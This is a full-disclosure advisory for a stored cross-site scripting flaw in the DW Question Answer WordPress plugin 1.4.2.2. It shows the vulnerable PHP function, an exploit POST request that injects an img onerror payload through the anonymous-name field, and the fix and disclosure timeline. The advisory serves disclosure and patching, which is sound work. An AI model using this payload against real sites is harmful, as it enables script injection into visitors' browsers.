WordPress DW Question Answer 1.4.2.2 Cross Site Scripting
Posted on 15 March 2016
## FULL DISCLOSURE #Product : DW Question Answer #Exploit Author : Rahul Pratap Singh #Version : 1.4.2.2 #Home page Link : https://wordpress.org/plugins/dw-question-answer/ #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 11/3/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- User.php function dwqa_get_author( $post_id = false ) { if ( !$post_id ) { $post_id = get_the_ID(); } $display_name = false; if ( dwqa_is_anonymous( $post_id ) ) { $anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true ); if ( $anonymous_name ) { $display_name = $anonymous_name; } else { $display_name = __( 'Anonymous', 'dwqa' ); } } else { $user_id = get_post_field( 'post_author', $post_id ); $display_name = get_the_author_meta( 'display_name', $user_id ); } return apply_filters( 'dwqa_get_author', $display_name, $post_id ); } ---------------------------------------- Exploit: ---------------------------------------- POST /index.php/dwqa-ask-question/ HTTP/1.1 question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email= abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+ onerror%3Dalert%281%29%3E%3C%21--&_wpnonce= 3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png Fix: Update to 1.4.2.3 Vulnerability Disclosure Timeline: → March 3, 2016 – Bug discovered, initial report to WordPress → March 7, 2016 – No response, Report sent again. → March 8, 2016 – WordPress response, plugin taken down → March 11, 2016 – Vendor deployed a patch ####################################### # CTG SECURITY SOLUTIONS # # www.ctgsecuritysolutions.com # ####################################### Pub Ref: https://wordpress.org/plugins/dw-question-answer/changelog/